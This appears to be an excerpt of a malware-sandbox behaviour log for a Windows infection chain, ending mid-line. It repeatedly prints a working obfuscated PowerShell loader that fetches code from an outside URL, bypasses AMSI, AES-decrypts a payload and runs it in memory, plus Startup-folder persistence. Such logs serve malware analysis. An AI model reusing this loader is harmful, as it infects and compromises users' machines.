(($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3396
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6356
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1539
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112 | Thread sleep count: 3396 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112 | Thread sleep count: 6356 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 756 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep count: 1457 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296 | Thread sleep count: 840 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2396 | Thread sleep count: 5407 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464 | Thread sleep count: 4342 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852 | Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120 | Thread sleep count: 1539 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
Source: wscript.exe, 00000000.00000002.1432781659.000002507006F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function 